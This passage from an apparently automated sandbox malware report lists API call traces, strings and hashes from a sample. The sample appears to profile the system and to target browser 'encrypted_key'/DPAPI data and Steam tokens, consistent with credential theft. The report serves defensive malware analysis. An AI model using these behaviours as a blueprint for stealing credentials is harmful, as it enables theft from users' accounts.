                              • Part of subcall function 00B22910: RegQueryValueExA.ADVAPI32(00B228A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00B22965
                              • Part of subcall function 00B22910: RegCloseKey.ADVAPI32(00B228A9), ref: 00B2296F
                            • RegOpenKeyExA.ADVAPI32(80000002,0186BE18,00000000,00020119,00B19500), ref: 00B228D1
                            • RegQueryValueExA.ADVAPI32(00B19500,0187EA80,00000000,00000000,00000000,000000FF), ref: 00B228EC
                            • RegCloseKey.ADVAPI32(00B19500), ref: 00B228F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: c7a27d32c9d6fe960984a41cb369500c24fe74c47048f9e4e4dbcbc7f35c52f4
                            • Instruction ID: a2eaa95496d801319d88b38d32c1ab63ceadc4757dfbb418f493dc01243019de
                            • Opcode Fuzzy Hash: c7a27d32c9d6fe960984a41cb369500c24fe74c47048f9e4e4dbcbc7f35c52f4
                            • Instruction Fuzzy Hash: 4C01AD75A00318BBDB149BA4EC89EAAB7BCEB44311F000198FE08D6390DAB09A4497B0
                            APIs
                            • LoadLibraryA.KERNEL32(?), ref: 00B0723E
                            • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00B07279
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B07280
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00B072C3
                            • HeapFree.KERNEL32(00000000), ref: 00B072CA
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00B07329
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                            • String ID:
                            • API String ID: 174687898-0
                            • Opcode ID: c862886dd147f34b3bd8f6841fe05f207e220d5a462f76aa499f74cc0b0a263c
                            • Instruction ID: 4d1c1b59a48832f2e45fcc283c6b9eb3bf96770327023cffee4ee27389789e38
                            • Opcode Fuzzy Hash: c862886dd147f34b3bd8f6841fe05f207e220d5a462f76aa499f74cc0b0a263c
                            • Instruction Fuzzy Hash: 55415B71B447069BEB20CF69DC84BAAF7E8FB85305F1445A9EC49C7390EA71F901DA60
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 00B09CA8
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00B09CDA
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00B09D03
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2746078483-738592651
                            • Opcode ID: 9914f019657205a706e21e6f471d26f2151e10a89d0f891e96be38aa0a776bda
                            • Instruction ID: f93639d2746967cf365fb2163b6c4bdbb0c5e13771de4a8f9849523dd8851c27
                            • Opcode Fuzzy Hash: 9914f019657205a706e21e6f471d26f2151e10a89d0f891e96be38aa0a776bda
                            • Instruction Fuzzy Hash: 30416E71A0020A9BDB21EF68DC456AFBBF4EF54314F0445F4E915A72A3DA30ED09C790
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00B1EA24
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1EA53
                            • lstrcat.KERNEL32(?,00000000), ref: 00B1EA61
                            • lstrcat.KERNEL32(?,00B31794), ref: 00B1EA7A
                            • lstrcat.KERNEL32(?,01878B58), ref: 00B1EA8D
                            • lstrcat.KERNEL32(?,00B31794), ref: 00B1EA9F
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: 281094e24525924b4049cc320bf9b5c1de1b3f8f0b3654eed4f92ee003dc4f53
                            • Instruction ID: c4e472a58123df570f8cd405ff37fde053a5d8ed126c04904f48187919643314
                            • Opcode Fuzzy Hash: 281094e24525924b4049cc320bf9b5c1de1b3f8f0b3654eed4f92ee003dc4f53
                            • Instruction Fuzzy Hash: 2E415671A10218ABCB55EB68DC45EED77F8FF58300F4044E4BA1AD7391DE709E888BA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B1ECDF
                            • lstrlen.KERNEL32(00000000), ref: 00B1ECF6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1ED1D
                            • lstrlen.KERNEL32(00000000), ref: 00B1ED24
                            • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 00B1ED52
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: steam_tokens.txt
                            • API String ID: 367037083-401951677
                            • Opcode ID: e27e7168b9cd8a8ab57537f814a16a667e408c3b9b6f4583ed215989e5c38acd
                            • Instruction ID: 7209a510dd4aae311dd3d0d15513e79c9c224b981b337634cddf7edfdd961ba9
                            • Opcode Fuzzy Hash: e27e7168b9cd8a8ab57537f814a16a667e408c3b9b6f4583ed215989e5c38acd
                            • Instruction Fuzzy Hash: FA312A31A106555BC722BB78EC4A99E7FE8AF50300F4541B0B856DB292DF24DD4E8BD1
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,00B0140E), ref: 00B09A9A
                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00B0140E), ref: 00B09AB0
                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,00B0140E), ref: 00B09AC7
                            • ReadFile.KERNEL32(00000000,00000000,?,00B0140E,00000000,?,?,?,00B0140E), ref: 00B09AE0
                            • LocalFree.KERNEL32(?,?,?,?,00B0140E), ref: 00B09B00
                            • CloseHandle.KERNEL32(00000000,?,?,?,00B0140E), ref: 00B09B07
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: d856416ebf743bd54a687b313a0e2d0b5cd56c31c3aad7bf1166167a1e15e8e8
                            • Instruction ID: 0b041e98302e1c50b84f855220a8b9364efa3089ffa0de88c0e8ee81abbec741
                            • Opcode Fuzzy Hash: d856416ebf743bd54a687b313a0e2d0b5cd56c31c3aad7bf1166167a1e15e8e8
                            • Instruction Fuzzy Hash: 81111C71600309AFE710DFA9DDD8AAA7BACEB44750F1041A9F911D72C1EB70DD50CBA0
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00B25B14
                              • Part of subcall function 00B2A173: std::exception::exception.LIBCMT ref: 00B2A188
                              • Part of subcall function 00B2A173: std::exception::exception.LIBCMT ref: 00B2A1AE
                            • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00B25B7C
                            • memmove.MSVCRT(00000000,?,?), ref: 00B25B89
                            • memmove.MSVCRT(00000000,?,?), ref: 00B25B98
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long
                            • API String ID: 2052693487-3788999226
                            • Opcode ID: 47120620e4ed10c88787404ab427f971625ed2ec4a057f415a36b728b5dee0b2
                            • Instruction ID: 04c0ec39d386268907d518c24afb720833fdc957e2914b0c021fa672e8a63d57
                            • Opcode Fuzzy Hash: 47120620e4ed10c88787404ab427f971625ed2ec4a057f415a36b728b5dee0b2
                            • Instruction Fuzzy Hash: C9417271B005199FCF18DF6CD995AAEBBF5EB88310F148269E919E7344E630ED01CB90
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00B17D58
                              • Part of subcall function 00B2A1C0: std::exception::exception.LIBCMT ref: 00B2A1D5
                              • Part of subcall function 00B2A1C0: std::exception::exception.LIBCMT ref: 00B2A1FB
                            • std::_Xinvalid_argument.LIBCPMT ref: 00B17D76
                            • std::_Xinvalid_argument.LIBCPMT ref: 00B17D91
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_$std::exception::exception
                            • String ID: invalid string position$string too long
                            • API String ID: 3310641104-4289949731
                            • Opcode ID: 73d6f133eb93a7d61c58b2b41dfcfa0fb7231aa85b3575648493d9c4e22b542a
                            • Instruction ID: 4c08737ca77b3e48b93751cda80d25f1a55e09fe87843582ddc502d48b6a34bf
                            • Opcode Fuzzy Hash: 73d6f133eb93a7d61c58b2b41dfcfa0fb7231aa85b3575648493d9c4e22b542a
                            • Instruction Fuzzy Hash: 1221D5723442048BD720DE2CE881A7AB7F9EF91720F604ABEE4558B291DB70DC808761
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B233EF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B233F6
                            • GlobalMemoryStatusEx.KERNEL32 ref: 00B23411
                            • wsprintfA.USER32 ref: 00B23437
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB
                            • API String ID: 2922868504-2651807785
                            • Opcode ID: 536b5c1a5c4a9c306e23741c2d604c72d597173dcb49093e51d678b24fca88ac
                            • Instruction ID: b785f983718f258647b54d277b9423cc75267220cd430710ec0f8e1bda1ed599
                            • Opcode Fuzzy Hash: 536b5c1a5c4a9c306e23741c2d604c72d597173dcb49093e51d678b24fca88ac
                            • Instruction Fuzzy Hash: BB01D871A04714AFDB14DF98DD85B6EB7F9FB44B10F000269F916E7380D7B8590086A5
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,0187DA30,00000000,00020119,?), ref: 00B1D7F5
                            • RegQueryValueExA.ADVAPI32(?,0187ED80,00000000,00000000,00000000,000000FF), ref: 00B1D819
                            • RegCloseKey.ADVAPI32(?), ref: 00B1D823
                            • lstrcat.KERNEL32(?,00000000), ref: 00B1D848
                            • lstrcat.KERNEL32(?,0187EDF8), ref: 00B1D85C
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValue
                            • String ID:
                            • API String ID: 690832082-0
                            • Opcode ID: 0707f593ada6bf78e3ef20f494214008a361d88ce84d19f5c2a9a1c71c0ce95f
                            • Instruction ID: abe2567d3226a5a734073a4b50476dacfd9450051faf96fa57e8504fdcbab30d
                            • Opcode Fuzzy Hash: 0707f593ada6bf78e3ef20f494214008a361d88ce84d19f5c2a9a1c71c0ce95f
                            • Instruction Fuzzy Hash: C6412475A1020CAFCB54EF68EC86BDE77B5AF54304F4040A4B509D7391EE30AA898FA1
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00B17F31
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B17F60
                            • StrCmpCA.SHLWAPI(00000000,00B34C3C), ref: 00B17FA5
                            • StrCmpCA.SHLWAPI(00000000,00B34C3C), ref: 00B17FD3
                            • StrCmpCA.SHLWAPI(00000000,00B34C3C), ref: 00B18007
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 6aec86fb0bd6e1aaffa6ae7da0357b3188ce8027bae44f2fd716c436abb5eb08
                            • Instruction ID: 2077fc116494aee107623e5e42099949dde7ee665ec52bbff790e09646d03b72
                            • Opcode Fuzzy Hash: 6aec86fb0bd6e1aaffa6ae7da0357b3188ce8027bae44f2fd716c436abb5eb08
                            • Instruction Fuzzy Hash: F6416C7064821ADFCB20DF68D884EDAB7F4FF54300F514199E806DB351DB70AAA6CB91
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00B180BB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B180EA
                            • StrCmpCA.SHLWAPI(00000000,00B34C3C), ref: 00B18102
                            • lstrlen.KERNEL32(00000000), ref: 00B18140
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1816F
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: bf6f08bb0e0dd31b56c28a6ef46bfa8af7780e75ebbcaf9fa1d1234adc4cc5a0
                            • Instruction ID: a2dca2dd82a3765a3fed9bf91e172e36f45e70fb638983989135431c3836fb83
                            • Opcode Fuzzy Hash: bf6f08bb0e0dd31b56c28a6ef46bfa8af7780e75ebbcaf9fa1d1234adc4cc5a0
                            • Instruction Fuzzy Hash: CA416F72600206ABCB21DF6CD988BEABBF4FF48700F10859CA945E7254EF34D995CB90
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B23166
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B2316D
                            • RegOpenKeyExA.ADVAPI32(80000002,0186B8D8,00000000,00020119,?), ref: 00B2318C
                            • RegQueryValueExA.ADVAPI32(?,0187DBB0,00000000,00000000,00000000,000000FF), ref: 00B231A7
                            • RegCloseKey.ADVAPI32(?), ref: 00B231B1
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: 57364cf12724fbf127d7c9639e2a903e8ece3ecbd51dc48662de52fd09df2a86
                            • Instruction ID: 2ee6e4a27b8688c0d7c5eb7e244b38809d9489129a9857a038d811fc445b492c
                            • Opcode Fuzzy Hash: 57364cf12724fbf127d7c9639e2a903e8ece3ecbd51dc48662de52fd09df2a86
                            • Instruction Fuzzy Hash: 71116072A04319AFD714CB94EC45BABB7BCEB44B11F004159FA09E2380DB7459048BB1
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: String___crt$Type
                            • String ID:
                            • API String ID: 2109742289-3916222277
                            • Opcode ID: 3b6eb00fc3f23b74780259b038c6c903266502577f34cd00c4c0d91e1bd1363e
                            • Instruction ID: 59d649573d5a4a18e6facf63da0bdf8a0403bc4d8508b48cb0a52d557ddbab5a
                            • Opcode Fuzzy Hash: 3b6eb00fc3f23b74780259b038c6c903266502577f34cd00c4c0d91e1bd1363e
                            • Instruction Fuzzy Hash: EF41277050076CAEDB318B259C89FFB7BFCDB45304F1444E8E98E96182E2719A458F20
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00B08996
                              • Part of subcall function 00B2A1C0: std::exception::exception.LIBCMT ref: 00B2A1D5
                              • Part of subcall function 00B2A1C0: std::exception::exception.LIBCMT ref: 00B2A1FB
                            • std::_Xinvalid_argument.LIBCPMT ref: 00B089CD
                              • Part of subcall function 00B2A173: std::exception::exception.LIBCMT ref: 00B2A188
                              • Part of subcall function 00B2A173: std::exception::exception.LIBCMT ref: 00B2A1AE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: invalid string position$string too long
                            • API String ID: 2002836212-4289949731
                            • Opcode ID: f7be382d19263cfb8f964ec6543c445c973d6ac7071bba7e89e61d07512a610b
                            • Instruction ID: 1aba02ac24e5f43be521363236fcd87ff258ee31a4112af368e44e36cbb20028
                            • Opcode Fuzzy Hash: f7be382d19263cfb8f964ec6543c445c973d6ac7071bba7e89e61d07512a610b
                            • Instruction Fuzzy Hash: BB21D6723006508BC720AA5CE840A6AFBD9DBA17A1B2109BFF1C1CB6C1CB71DD41C7E5
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00B08883
                              • Part of subcall function 00B2A173: std::exception::exception.LIBCMT ref: 00B2A188
                              • Part of subcall function 00B2A173: std::exception::exception.LIBCMT ref: 00B2A1AE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long$yxxx$yxxx
                            • API String ID: 2002836212-1517697755
                            • Opcode ID: c808d6020eeadee6f3f03054875d635e024792b18ec18d2511e2e0145988b61b
                            • Instruction ID: ceb65903597c6084bf348b7bbf8aa5228360ff368155715124b9f906a04badce
                            • Opcode Fuzzy Hash: c808d6020eeadee6f3f03054875d635e024792b18ec18d2511e2e0145988b61b
                            • Instruction Fuzzy Hash: 3D3197B5E005159BCB08DF58C8916ADBBF6EB88350F148269E915AF384DB30AE01CB91
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00B25922
                              • Part of subcall function 00B2A173: std::exception::exception.LIBCMT ref: 00B2A188
                              • Part of subcall function 00B2A173: std::exception::exception.LIBCMT ref: 00B2A1AE
                            • std::_Xinvalid_argument.LIBCPMT ref: 00B25935
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_std::exception::exception
                            • String ID: Sec-WebSocket-Version: 13$string too long
                            • API String ID: 1928653953-3304177573
                            • Opcode ID: d384735ca909e1e1ee729a32f7dc28062e7e4fdead5b3ec332572b16661683f9
                            • Instruction ID: ffbe27d33fa7f5ee2f871ae3d11308d4ce1002437ebd3ac49d518a571a552926
                            • Opcode Fuzzy Hash: d384735ca909e1e1ee729a32f7dc28062e7e4fdead5b3ec332572b16661683f9
                            • Instruction Fuzzy Hash: F9117C30304B60CBD7318B2CF840B1AB7E5EBD2761F250ADAE0D987695D771E881C7A1
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,00B2A430,000000FF), ref: 00B23D20
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B23D27
                            • wsprintfA.USER32 ref: 00B23D37
                              • Part of subcall function 00B271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00B271FE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            • Opcode ID: 32d40c101e89f8058d4a0694848706652b98f8856614f6803f905a85036e7c4c
                            • Instruction ID: 599e538c9fc241693d0989f455455d654e4286b44ea3087025e0830b4e3e021a
                            • Opcode Fuzzy Hash: 32d40c101e89f8058d4a0694848706652b98f8856614f6803f905a85036e7c4c
                            • Instruction Fuzzy Hash: 5A018071644714BBE7245B54EC4AF6ABBB8FB45B62F100155FA05D73D0DBB41900C6B1
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00B08737
                              • Part of subcall function 00B2A173: std::exception::exception.LIBCMT ref: 00B2A188
                              • Part of subcall function 00B2A173: std::exception::exception.LIBCMT ref: 00B2A1AE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long$yxxx$yxxx
                            • API String ID: 2002836212-1517697755
                            • Opcode ID: 68a9a1dbe7c589167dfd200d710b1757b786c28fc70e6cad5abf7b3408a80385
                            • Instruction ID: 52a3ec485523bfedbf834ba785b750ad789cab6e8dd0e60cfc7c664edc5567d4
                            • Opcode Fuzzy Hash: 68a9a1dbe7c589167dfd200d710b1757b786c28fc70e6cad5abf7b3408a80385
                            • Instruction Fuzzy Hash: 6FF09027B040310FC314643D9D8445EAD8697E539033AD7A5E99AEF29DEC70ED8285D5
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00B1E544
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1E573
                            • lstrcat.KERNEL32(?,00000000), ref: 00B1E581
                            • lstrcat.KERNEL32(?,0187DB90), ref: 00B1E59C
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: 116faa1c0134d3edc3b1f6e03ec212910ffc061a3a7b5166d1e1f1c996ed4f4d
                            • Instruction ID: 46cc2cf0a9fedd03dfd09ac2ff7a386ee8b07e787fa97f13645997be6b3909f0
                            • Opcode Fuzzy Hash: 116faa1c0134d3edc3b1f6e03ec212910ffc061a3a7b5166d1e1f1c996ed4f4d
                            • Instruction Fuzzy Hash: DE51A875A10208ABC755EB58DC46EEE77F9FB48300F4444E8B919D7391DF70AE898BA0
                            APIs
                            Strings
                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00B21FDF, 00B21FF5, 00B220B7
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: strlen
                            • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                            • API String ID: 39653677-4138519520
                            • Opcode ID: 1da144425978314b5a0c44483d0c7765ebfa1e83ca74bf6c93c1703db641679a
                            • Instruction ID: 0457c469379e88f8816f1736d70cc15a6bb23b0b5b8438792a27b3bd171aa55b
                            • Opcode Fuzzy Hash: 1da144425978314b5a0c44483d0c7765ebfa1e83ca74bf6c93c1703db641679a
                            • Instruction Fuzzy Hash: 07215A39510199AEDB20EB35E4846EEF3E7EF84761F9440D6C81C8B251E336290AD796
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00B1EBB4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1EBE3
                            • lstrcat.KERNEL32(?,00000000), ref: 00B1EBF1
                            • lstrcat.KERNEL32(?,0187EE40), ref: 00B1EC0C
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: 1a4775e6c672c3af15aa08c8b57b35605525daf19ee6012f452bc0d3390504b0
                            • Instruction ID: d7cd09605a65f21f620e57c2c0eac536c77866905dddab9e1161ff44377c5664
                            • Opcode Fuzzy Hash: 1a4775e6c672c3af15aa08c8b57b35605525daf19ee6012f452bc0d3390504b0
                            • Instruction Fuzzy Hash: 36315271A102189BCB25EB68DC45BEE77F4AF48300F1044F8BA16D7291DE709E888BA0
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,00B2A3D0,000000FF), ref: 00B22B8F
                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00B22B96
                            • GetLocalTime.KERNEL32(?,?,00000000,00B2A3D0,000000FF), ref: 00B22BA2
                            • wsprintfA.USER32 ref: 00B22BCE
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            • Opcode ID: 436eefc0be5ad0351088a3d87df374ecacae4a83eef59037b8eddfe1ba6dff14
                            • Instruction ID: e1c661bd15b8ea5f0f6129577fa9db65431cf3b5ca4f3d01478055c05fbb1c54
                            • Opcode Fuzzy Hash: 436eefc0be5ad0351088a3d87df374ecacae4a83eef59037b8eddfe1ba6dff14
